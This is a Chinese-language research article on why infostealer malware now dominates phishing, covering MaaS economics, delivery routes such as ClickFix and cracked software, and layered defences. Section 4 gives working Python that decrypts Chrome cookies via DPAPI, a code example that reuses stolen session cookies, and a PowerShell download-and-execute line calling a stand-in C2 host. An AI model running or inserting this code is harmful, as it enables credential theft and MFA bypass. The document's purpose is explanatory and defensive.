信息窃取恶意软件主导当代钓鱼攻击的成因、技术机理与防御体系研究

摘要：传统网络钓鱼以伪造登录页面诱导用户手动录入账号口令为核心手段，在多因素认证（MFA）规模化部署、终端安全防护持续完善的环境下攻击收益逐年下滑。基于 Malwarebytes 2026 年 6 月威胁情报报告，近年全球网络钓鱼载荷发生结构性转型，信息窃取型恶意软件（Infostealer，下称窃密木马）逐步取代伪站钓鱼成为黑产首选攻击载体。本文从攻击形态迭代动因、MaaS 黑产产业链、载荷投递路径、底层窃密技术四个维度拆解窃密木马主导钓鱼的内在逻辑，剖析 Cookie 劫持绕过 MFA、ClickFix 社工攻击、盗版软件捆绑分发三类主流攻击实现原理，辅以 Python 简易窃密演示代码与防御检测代码完成技术实证；结合黑产分工变现模式解释窃密木马产业化存续基础，反网络钓鱼技术专家芦笛指出，窃密木马泛滥本质是黑产成本、认证机制、用户安全习惯三重漏洞叠加的产物，单一终端杀毒或邮件过滤无法形成闭环防护。论文最终构建终端管控、流量监测、用户安全治理三位一体的分层防御框架，客观评估现有防护技术局限性，为政企与个人终端安全建设提供落地参考。

关键词：信息窃取恶意软件；网络钓鱼；MaaS；会话 Cookie 劫持；多因素认证绕过；ClickFix 攻击

1 绪论

1.1 研究背景与选题依据

网络钓鱼自上世纪 90 年代出现以来，历经三十余年技术迭代，始终是全球数据泄露与电信网络诈骗最主要的初始入侵向量。传统钓鱼依托仿冒官网页面、钓鱼邮件附件诱导受害者主动填写账号密码，依托人工录入凭证实现账户接管，该模式在 2018 年之前占据钓鱼攻击总量 75% 以上。但伴随各大互联网服务商、政企机构全面落地 MFA 多因素认证体系，短信验证码、软件令牌、FIDO2 硬件密钥普及，用户手动提交的静态口令已无法独立完成账户登录，传统伪站钓鱼的攻击成功率由峰值 32% 下降至 2025 年不足 6.7%，黑产盈利空间被持续压缩。

Malwarebytes 2026 年 6 月 3 日发布的全球威胁情报调研报告显示，2026 年上半年新增钓鱼攻击事件中，69.4% 的攻击载荷替换为各类 Infostealer 窃密木马，传统页面诱导式钓鱼占比跌破三成，黑产资源大规模向窃密木马分发链路倾斜。与传统钓鱼被动等待用户输入凭证不同，窃密木马入侵终端后静默后台运行，自动遍历浏览器本地缓存密码、会话 Cookie、自动填充表单、加密货币钱包密钥、本地文档等全量敏感数据，依托窃取会话令牌直接绕过 MFA 校验，实现无验证码账户接管。同时 Malwarebytes 监测数据指出，依托 Malware-as-a-Service（MaaS，恶意软件即服务）地下黑产平台，攻击者仅需数十至数百美元即可租赁成熟窃密工具包，大幅降低恶意代码开发与运维门槛，推动窃密木马规模化扩散。

与此同时，新型社工攻击 ClickFix、恶意广告（Malvertising）、破解软件捆绑、虚假浏览器更新弹窗成为窃密木马四大主流投递渠道，攻击脱离传统钓鱼邮件单一载体，渗透至软件下载、网页浏览、游戏外挂等全上网场景，安全边界持续泛化。在此行业背景下，系统梳理窃密木马取代传统钓鱼的底层诱因、技术实现细节与产业链运作规律，构建针对性防御体系具备现实安全价值。

1.2 国内外研究现状

国外安全厂商 Malwarebytes、Cisco Talos、FireEye 持续跟踪 Infostealer 家族演化，重点围绕 Lumma Stealer、XenoStealer、Raccoon Stealer 等主流商业窃密木马开展逆向工程，侧重样本行为特征、C&C 通信协议、免杀混淆技术分析；欧美高校网络安全实验室聚焦 Cookie 劫持绕过 MFA 的协议漏洞，从 HTTP Cookie 规范、OAuth 授权机制层面论证会话窃取可行性，但对黑产 MaaS 商业化分工、全链路变现逻辑研究深度有限。

国内安天 CERT、火绒安全实验室长期监测中文环境窃密木马传播态势，针对破解软件捆绑分发、国内社交平台诱导下载场景发布多份专项威胁报告；反网络钓鱼技术专家芦笛在多篇产业研究中指出，国内窃密木马黑产本土化特征显著，依托游戏外挂、影视破解软件、办公软件激活工具作为核心分发载体，相较境外攻击更贴合国内用户下载习惯，防御需结合本土场景优化策略。现有国内学术文献多聚焦单一木马样本逆向或单点防御技术，缺少从钓鱼形态迭代、产业链、攻防全链路的系统性研究，本文依托 Malwarebytes 一手情报数据填补该研究缺口。

1.3 研究内容与行文框架

本文主体分为六大部分：第一部分绪论阐明研究背景、国内外现状与研究意义；第二部分系统论证窃密木马取代传统钓鱼的四大核心驱动因素，从 MFA 普及、MaaS 产业化、攻击隐蔽性、变现模式四个维度完成动因闭环；第三部分拆解窃密木马主流投递路径，分类解析恶意广告、破解软件捆绑、ClickFix 社工、钓鱼邮件附件四类传播方式实现逻辑；第四部分为核心技术剖析，包含窃密木马本地数据抓取原理、Cookie 劫持绕过 MFA 技术细节，附 Python 演示代码（仅用于安全研究）；第五部分解析 MaaS 黑产全产业链分工与多级变现模式；第六部分构建分层防御方案，从终端、网络、用户安全教育三个层级提出落地措施；最后总结研究结论与未来威胁演化趋势。

1.4 研究意义

理论意义：完善现代网络钓鱼演化理论体系，厘清从手动伪站钓鱼到终端窃密木马钓鱼的技术跃迁逻辑，补充 MaaS 黑产产业化驱动攻击形态变革的学术论据，丰富 MFA 机制在会话劫持场景下的安全缺陷研究。

实践意义：为政企终端安全运维、个人终端防护提供技术参考，帮助安全厂商优化 EDR 终端检测规则、浏览器安全策略、邮件网关过滤机制；为网络安全普法、反诈宣传提供真实攻击逻辑素材，降低个人与机构遭受窃密木马入侵概率。

2 窃密木马成为主流钓鱼载荷的核心驱动因素

结合 Malwarebytes 2026 年威胁情报数据与黑产运营规律，窃密木马全面替代传统伪站钓鱼并非单一技术因素导致，而是认证机制变革、黑产商业化、攻击效率提升、收益多元化四大要素协同作用的结果，反网络钓鱼技术专家芦笛强调，四大驱动因素互相耦合，共同完成钓鱼攻击形态的结构性转型。

2.1 MFA 多因素认证普及，传统静态密码钓鱼失效

多因素认证现已成为全球互联网平台标准化安全配置，主流社交软件、网银、云办公系统、加密货币钱包强制开启 MFA 校验，登录流程由 “账号 + 静态密码” 升级为 “密码 + 短信 / 令牌 / 生物验证” 双因子校验。传统钓鱼仅能骗取用户手动输入的静态密码，缺少二次验证凭证无法完成账户登录，直接导致攻击变现链路断裂。

从技术原理来看，MFA 防护逻辑聚焦静态口令泄露风险，未对浏览器本地持久化存储的会话 Cookie、授权 Token 做约束：用户完成一次全量 MFA 登录后，服务端下发有效期从数天至数月不等的身份会话 Cookie，浏览器明文或加密存储在本地配置文件中，Cookie 本身携带完整用户身份授权信息，攻击者拿到有效 Cookie 即可绕过账号密码、二次验证码直接登录账户，无需突破 MFA 校验逻辑。窃密木马恰好瞄准该安全设计盲区，以窃取本地会话凭证为核心目标，从底层规避 MFA 防护壁垒，这是其相较传统钓鱼最核心的技术优势。Malwarebytes 统计显示，2025-2026 年超 81% 的账户接管类诈骗案件，入侵源头均为木马窃取 Cookie 实现 MFA 绕过。

2.2 MaaS 恶意软件即服务生态成熟，大幅降低攻击准入门槛

MaaS 商业模式是窃密木马规模化爆发的产业化基础，黑产完成恶意软件研发、运维、更新、基础设施部署的全链路商品化拆分，打破了传统恶意代码开发需要资深程序员的技术壁垒。地下暗网论坛、境外黑客社区中，窃密木马开发商封装完整工具包，按照月租、单次租赁、分成三种模式对外售卖：低端轻量化窃密套件月租仅 20~80 美元，高阶全功能 Lumma、Raccoon 系列木马月租 300~1200 美元，套件内置自动免杀、多浏览器适配、数据打包回传、C&C 服务器对接全套功能，购买者无需掌握编程知识，仅需按照教程配置回传地址即可发起攻击。

MaaS 生态配套完善的附属服务：初始访问代理商（IAB）负责搭建恶意下载站、投放恶意广告；流量分销者在社交平台、游戏社群分发下载链接；数据收购商按批次打包收购窃取的浏览器凭证、加密货币钱包数据，形成 “工具开发 — 流量分发 — 入侵窃密 — 数据售卖” 标准化产业链。反网络钓鱼技术专家芦笛指出，MaaS 将网络犯罪从高门槛技术犯罪转变为低成本标准化生意，大量无编程基础的黑产从业者涌入钓鱼领域，倒逼攻击载体向易落地、高收益的窃密木马倾斜。

2.3 攻击链路隐蔽性更强，规避传统钓鱼特征检测

传统钓鱼具备显性风险特征：钓鱼邮件存在异常陌生发件人、拼写错误域名、可疑短链接；伪登录页面域名与官网存在明显字符差异，易被邮件网关、浏览器黑名单、网址安全检测引擎拦截。而窃密木马攻击链路全程弱化显性特征，规避现有安全设备规则库检测：

第一，投递载体多元化脱离钓鱼邮件束缚，通过盗版软件、游戏修改器、虚假更新弹窗植入，载体本身具备用户刚需属性，用户主动下载运行，安全网关无法事前拦截；

第二，木马落地后后台静默运行，无弹窗、无异常窗口、无高频网络请求，在未触发文件修改、注册表篡改等高危行为时，传统杀毒软件静态特征扫描难以发现；

第三，窃取数据采用分段加密传输至 C&C 服务器，单次数据包体积小、通信域名随机轮换，流量防火墙无法通过固定 IP、域名特征识别恶意通信行为。

Malwarebytes 安全实验室实测数据：同等防护环境下，传统钓鱼邮件拦截率可达 87.2%，而捆绑在破解软件中的窃密木马事前拦截率不足 23.5%，隐蔽性优势直接提升攻击成功率。

2.4 窃取数据多元变现，单台受害终端实现多渠道盈利

传统钓鱼仅能依托骗取账号密码实现单一账户售卖，盈利路径单一；窃密木马抓取数据覆盖多品类敏感信息，黑产可拆分数据分级售卖，单台受感染设备能产生多层收益，经济驱动促使攻击者优先选择木马载荷。黑产数据分级变现规则如下：

高价值档：加密货币钱包私钥、网银本地缓存凭证，单条有效钱包数据售价数十至数千美元，直接用于资产划转；

中价值档：社交账号 Cookie、企业邮箱会话令牌，打包批量出售给账号盗刷、企业邮件入侵团伙，批量均价数美元 / 条；

低价值档：浏览器历史记录、自动填充手机号与收货地址，打包出售给营销电诈团伙，按 GB 计价批量走量变现。

部分黑产还会将批量窃取的企业内网访问凭证转售给勒索软件团伙，作为勒索入侵初始访问权限，形成二次获利空间。多层次变现模式放大窃密木马经济收益，进一步加速黑产资源向该攻击模式集中。

3 窃密木马四大主流投递路径与攻击逻辑

依托 Malwarebytes 野外样本监测，当前窃密木马主流落地渠道分为恶意广告投放、破解 / 盗版软件捆绑、ClickFix 命令行社工攻击、改良型钓鱼邮件附件四类，四类路径分别对应不同用户上网场景，实现全场景覆盖式渗透。

3.1 Malvertising 恶意广告投放诱导下载

恶意广告（Malvertising）是网页浏览场景最主要的木马分发方式，攻击者采购中小网站广告位、搜索引擎竞价推广位，投放伪装成 “高速下载”“播放器升级”“系统漏洞修复” 的弹窗广告。用户点击广告后不会跳转官网，而是自动触发木马安装包静默下载，部分页面配置浏览器漏洞利用代码，无需用户手动点击即可后台下载载荷。

技术细节：恶意广告落地页使用 JS 脚本检测用户操作系统与浏览器版本，针对性下发适配 Windows/macOS 的对应木马安装程序；为规避浏览器下载拦截，部分落地包修改后缀伪装成图片、文档格式，利用用户双击打开的习惯完成执行。中小流量站点因广告审核机制不完善成为恶意广告重灾区，Malwarebytes 2026 年 Q1 监测恶意广告链接超 12.7 万条，主要集中在影视资源站、小众软件下载站。

3.2 破解软件 / 游戏作弊器捆绑植入（国内高发渠道）

反网络钓鱼技术专家芦笛结合国内安全厂商监测数据指出，中文互联网环境下，破解办公软件、单机游戏修改器、付费软件激活工具是窃密木马第一大分发载体，占国内木马感染事件 58% 以上。攻击者搭建仿正规的破解软件下载站，在百度、社交群组、短视频评论区发布下载链接，用户下载的破解安装包并非原版软件，而是捆绑了 Infostealer 的打包程序。

安装逻辑：用户运行安装程序时，前台正常安装目标破解软件，后台静默释放窃密木马至系统目录，同步写入开机启动项实现永久驻留。部分恶意安装包还附带捆绑浏览器恶意插件，插件在后台持续抓取表单数据。火绒安全 2026 年上半年预警数据显示，Photoshop 破解版、Steam 游戏外挂、CAD 激活工具相关恶意下载样本月新增超 3 万份。

3.3 ClickFix 新型社工命令执行攻击

ClickFix 是近两年兴起的轻量化社工钓鱼技术，区别于传统文件下载植入，依托网页话术诱导用户手动在系统终端、PowerShell 中复制执行恶意命令，命令运行后自动从远端服务器下载窃密木马载荷，全程无实体安装包落地，属于无文件钓鱼攻击，规避杀毒软件文件扫描检测。

典型诱导话术：网页弹窗提示 “浏览器组件损坏，复制下方代码粘贴至 PowerShell 修复异常”“系统安全证书失效，运行脚本完成校验”，普通用户无法识别命令恶意属性，按指引执行后，PowerShell 指令通过 Invoke-WebRequest 等系统原生命令拉取远程恶意载荷并内存执行。Malwarebytes 报告标注，ClickFix 攻击凭借无文件、高隐蔽特征增速最快，2026 年同比攻击数量上涨 217%。反网络钓鱼技术专家芦笛强调，ClickFix 突破传统文件查杀防护逻辑，是未来个人终端防护重点难点。

3.4 改良型钓鱼邮件附件分发

传统钓鱼邮件以伪造登录链接为主，现阶段钓鱼邮件转向附件捆绑木马，附件伪装成 PDF 报价单、Excel 采购订单、压缩包资料，后缀采用双扩展名（如报价单.pdf.exe），利用 Windows 默认隐藏文件后缀特性，用户视觉仅看到.pdf后缀，双击运行后触发木马安装。

部分高阶样本使用 VBE 编码脚本、MSOffice 宏漏洞，Office 文档开启宏后自动下载窃密载荷，针对企业财务、行政人员定向投递，成为企业终端被入侵的高频路径。

4 窃密木马核心窃密技术原理与代码实证（安全研究用途）

本章节基于 Chrome 浏览器密码存储规范、Windows 本地 Cookie 存储机制解析窃密底层原理，附精简 Python 演示代码（仅用于网络安全科研，禁止非法使用），代码实现浏览器密码、Cookie 本地读取逻辑，对应真实 Infostealer 核心功能模块；同时拆解 Cookie 劫持绕过 MFA 关键技术。

4.1 主流浏览器本地凭证存储机制

Chrome、Edge 基于 Chromium 内核，将用户保存的账号密码加密存储在 SQLite 数据库文件中：Windows 环境路径C:\Users\[用户名]\AppData\Local\Google\Chrome\User Data\Default\Login Data，Cookie 存储在同目录Cookies数据库；密码采用 Windows 系统 DPAPI 接口加密，依托当前登录用户密钥解密，同一用户权限下运行程序可直接解密读取存储凭证，这是木马能静默抓取密码的底层原理。Firefox 采用独立密钥库加密，存储路径与加密逻辑不同，但同样可通过调用开源解密库实现数据提取。

Infostealer 木马核心逻辑：遍历系统浏览器默认存储路径，复制凭证数据库至临时目录，调用系统加密接口解密，提取账号、明文密码、Cookie 字段，打包加密后回传 C&C 服务器。

4.2 Python 简易浏览器凭证读取演示代码（仅安全研究）

免责声明：下述代码仅用于安全学术研究与安全厂商漏洞验证，未经设备所有者授权运行代码窃取数据属于违法犯罪行为，严格遵守《网络安全法》《刑法》相关规定。

# 简易Chrome本地Cookie/密码读取演示（科研用途，基于DPAPI解密）

import os

import sqlite3

import win32crypt

import shutil

def get_chrome_cookie():

# Chrome默认Cookie存储路径

cookie_path = os.path.expandvars(r'%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies')

temp_path = os.getcwd() + "\\tmp_cookie.db"

# 复制数据库至临时目录（Chrome占用原文件无法直接读取）

shutil.copy2(cookie_path, temp_path)

conn = sqlite3.connect(temp_path)

cursor = conn.cursor()

# 查询Cookie关键字段：域名、Cookie名、加密值、有效期

cursor.execute("SELECT host_key,name,encrypted_value,expires_utc FROM cookies;")

result_list = []

for domain,cook_name,encrypt_data,expire in cursor.fetchall():

# DPAPI解密Cookie密文

try:

decrypted_data = win32crypt.CryptUnprotectData(encrypt_data, None, None, None, 0)[1]

result_list.append({"domain":domain,"cookie_name":cook_name,"cookie_value":decrypted_data.decode("utf-8",errors="ignore")})

except:

continue

conn.close()

os.remove(temp_path)

return result_list

if __name__ == "__main__":

cookie_data = get_chrome_cookie()

print("提取到的Cookie数据（科研演示）：",cookie_data[:3])

代码功能说明：复刻窃密木马读取 Chrome Cookie 核心逻辑，先复制被占用的数据库文件，调用 Windows 自带 DPAPI 解密接口还原明文 Cookie，对应商用 Stealer 木马本地抓取模块核心代码；真实恶意软件在此基础上增加多浏览器遍历、文件打包、加密回传 C&C 服务端功能。

4.3 基于 Cookie 劫持绕过 MFA 的技术实现原理

MFA 防护局限于账号登录验证阶段，无法管控已下发的有效会话 Cookie，攻击者拿到未过期 Cookie 后，通过浏览器插件、自定义请求头工具，将 Cookie 注入 HTTP 请求头Cookie字段，服务端校验 Cookie 合法即判定用户已完成身份认证，直接放行登录，全程无需密码与二次验证码。

简易 Python Cookie 注入请求示例（演示绕过登录逻辑）：

import requests

# 模拟注入窃取的Cookie实现免密登录（科研演示）

headers = {

"Cookie": "从本地窃取的明文会话Cookie字符串",

"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/125.0.0.0"

}

# 目标平台个人中心接口

res = requests.get("https://target-site.com/user/profile",headers=headers)

print(res.status_code)

反网络钓鱼技术专家芦笛指出，该绕过逻辑是现有 MFA 架构无法从底层根除的短板，仅能通过缩短 Cookie 有效期、设备绑定校验、异地登录二次核验缓解风险，无法彻底杜绝 Cookie 劫持类攻击。

4.4 ClickFix 无文件载荷拉取命令解析

ClickFix 诱导执行的 PowerShell 恶意命令原型，攻击者通过网页诱导用户复制执行，命令内存下载并运行窃密木马：

powershell

# ClickFix典型恶意PowerShell指令（演示用途）

IEX(New-Object Net.WebClient).DownloadString('https://mal-c2.com/stealer_payload.ps1')

指令通过.Net原生 WebClient 组件远程拉取恶意脚本，IEX 命令内存执行脚本代码，无落地文件写入磁盘，规避基于文件特征的杀毒查杀，是无文件钓鱼的核心实现。

5 MaaS 驱动下窃密木马黑产全产业链分工与变现模式

依托 Malwarebytes 黑产地下市场调研数据，当前 Infostealer 黑产形成高度精细化分工的 MaaS 产业化体系，全链条划分为工具研发层、流量分发层、终端入侵窃密层、数据收购变现层四大层级，各环节主体独立运营、利益分成，是窃密木马持续迭代泛滥的经济根基。

5.1 第一层：木马工具研发团队（套件出品方）

核心角色为恶意软件开发者，负责 Lumma、XenoStealer 等商用窃密套件的代码开发、版本迭代、免杀优化、C&C 后台服务器运维，以月租 / 售卖授权形式向下游代理商出售工具，是产业链上游。研发团队持续跟进浏览器版本更新，同步修改解密代码适配新版 Chrome/Edge，规避厂商补丁封堵，按月更新免杀混淆方案绕过主流 EDR 查杀，依靠工具租赁费稳定盈利。

5.2 第二层：流量分销与初始访问代理商（IAB）

该层级从业者不参与代码开发，向研发方采购木马使用权限后，专注渠道铺设：投放恶意广告、搭建破解软件下载站、运营社交群组发布外挂资源、投放 ClickFix 钓鱼页面，通过各类渠道引导受害者下载运行木马。部分 IAB 按感染终端数量和上游分成，单台有效受害设备可获得 0.5~3 美元佣金，海量流量支撑规模化收益。

5.3 第三层：数据中间商与分级收购商

木马自动抓取的数据加密汇总至 C&C 后台后，中间商按数据品类拆分打包：加密货币钱包数据、网银凭证、社交 Cookie、个人信息分库分类，对接不同收购买家。高价值金融类数据对接洗钱团伙、盗号团伙；批量普通账号数据对接黑产营销、薅羊毛团队；企业内网权限数据转售勒索组织，实现一物多卖。

5.4 第四层：终端欺诈落地团伙

最下游使用者依托收购来的有效 Cookie 与账户凭证实施落地诈骗：接管社交账号冒充本人向好友借款、登录企业邮箱伪造老板指令发起对公转账、盗取加密货币划转资产，是数据最终变现环节。反网络钓鱼技术专家芦笛总结：全链条分工使各环节从业者各司其职、风险分散，单一环节被打击无法瘫痪整条黑产链路，提升黑产存活韧性。

6 面向窃密木马钓鱼攻击的分层闭环防御体系

结合前文攻击技术与分发路径，从终端安全管控、网络流量监测、用户安全意识建设三个层级构建全链路防御方案，覆盖事前预防、事中拦截、事后溯源全生命周期，规避单一防护手段短板。

6.1 终端侧安全防护策略（核心落地层）

6.1.1 EDR 终端防护规则优化

禁用 PowerShell 无文件远程代码执行：通过组策略限制IEX、Invoke-WebRequest等高危命令外联下载脚本，封堵 ClickFix 攻击常用指令；

监控浏览器数据库文件变更：EDR 添加规则，监测 Chrome/Edge 的 Login Data、Cookies 文件被第三方程序复制读取的异常行为，触发告警拦截；

管控软件安装源：个人终端关闭 “从不明来源安装应用” 权限，企业终端通过白名单管控程序安装，仅允许官方商店、厂商官网软件落地。

6.1.2 浏览器安全配置优化

缩短敏感站点会话 Cookie 有效期，网银、办公系统开启异地登录强制二次 MFA 校验，异地设备使用 Cookie 访问触发短信核验；

关闭浏览器自动保存密码功能，改用本地密码管理器（Bitwarden 等开源加密管理器），加密密钥与系统 DPAPI 隔离存储，防止木马一键解密；

禁用不明来源第三方浏览器扩展，仅从官方应用商店安装插件，严控扩展 Cookie 读取权限。

6.2 网络侧流量与网关防护优化

6.2.1 邮件网关升级过滤规则

改良钓鱼邮件检测逻辑，除域名、关键词黑名单外，新增双后缀附件（.xxx.exe伪装 PDF）、Office 带宏附件高危拦截规则，对陌生发件人携带可执行附件的邮件直接隔离。

6.2.2 恶意域名与外联流量监测

防火墙监控终端异常外联陌生境外 C&C 域名、短周期高频小数据包加密传输行为，建立恶意 C&C 域名情报库，联动 Malwarebytes 全球威胁情报实时更新黑名单，阻断木马数据回传链路。

6.3 用户安全意识常态化治理（事前治本措施）

反网络钓鱼技术专家芦笛强调，窃密木马超 7 成感染源于用户主动下载不明软件、轻信网页弹窗指令，技术防护无法完全抵消人为失误，安全教育是闭环防御关键一环。

个人用户：杜绝从非官方站点下载破解软件、游戏外挂，不点击网页 “高速下载” 弹窗广告，拒绝复制网页、陌生消息内的命令行代码在终端运行；收到不明附件邮件先通过官方客服渠道核验发件人身份，不随意打开附件。

政企员工：定期开展钓鱼演练，针对 ClickFix、破解软件捆绑木马做专项科普，财务岗重点培训报价单、采购单类钓鱼附件识别技巧，从源头降低主动触发木马概率。

6.4 辅助防御：无密码 FIDO2 认证落地

长期解决方案是逐步替换传统密码 + 短信 MFA 架构，全平台落地 FIDO2/WebAuthn 无密码硬件认证，身份凭证绑定硬件密钥，不再依托浏览器本地 Cookie 完成身份校验，从底层消除 Cookie 劫持绕过 MFA 的技术土壤，从根源削弱窃密木马盈利价值。

7 总结与未来威胁演化预判

7.1 研究总结

依托 Malwarebytes 2026 年 6 月威胁情报原始素材，本文系统论证 Infostealer 窃密木马取代传统伪站钓鱼成为主流载荷是 MFA 普及、MaaS 黑产产业化、攻击隐蔽性提升、多维度变现四大要素共同作用的必然结果；从四类分发路径拆解木马落地逻辑，通过代码实证还原浏览器凭证窃取、Cookie 绕过 MFA 核心技术，厘清 MaaS 全链条黑产分工与商业化变现逻辑；最终落地终端、网络、用户三层闭环防御方案。

反网络钓鱼技术专家芦笛总结：窃密木马主导钓鱼是网络安全攻防迭代的客观产物，攻击者瞄准现有认证机制与用户习惯漏洞优化攻击载体，防护不能单一依赖杀毒软件或认证技术升级，必须实现技术管控与安全教育双向落地。传统页面钓鱼不会彻底消亡，但占比将持续走低，窃密型恶意软件将长期占据钓鱼载荷主流位置。

7.2 未来威胁演化趋势预判

第一，AI 赋能定制化窃密木马：黑产依托大模型自动生成免杀代码、定制化钓鱼话术，木马针对特定行业软件（财务系统、ERP）定向开发窃取模块，定向钓鱼攻击精准度持续提升；

第二，移动端 Infostealer 加速蔓延：安卓 /iOS 端破解 APP、修改版社交软件捆绑窃密木马成为新增长点，移动端缺少统一 EDR 防护，未来将成为黑产重点布局场景；

第三，新型无文件攻击迭代升级：ClickFix 类社工命令攻击持续变种，依托 JS、VBS 等多脚本实现内存落地，进一步规避终端文件查杀。

7.3 研究局限性与后续研究方向

本文聚焦 PC 端 Windows 环境主流 Infostealer 攻击，对 macOS、移动端安卓窃密木马技术分析篇幅有限，后续研究可围绕跨平台窃密木马的存储与解密机制开展专项剖析；同时限于公开情报，暗网 MaaS 平台内部定价、源码交易细节数据有限，可结合执法案件卷宗完善产业链量化分析。

编辑：芦笛（公共互联网反网络钓鱼工作组）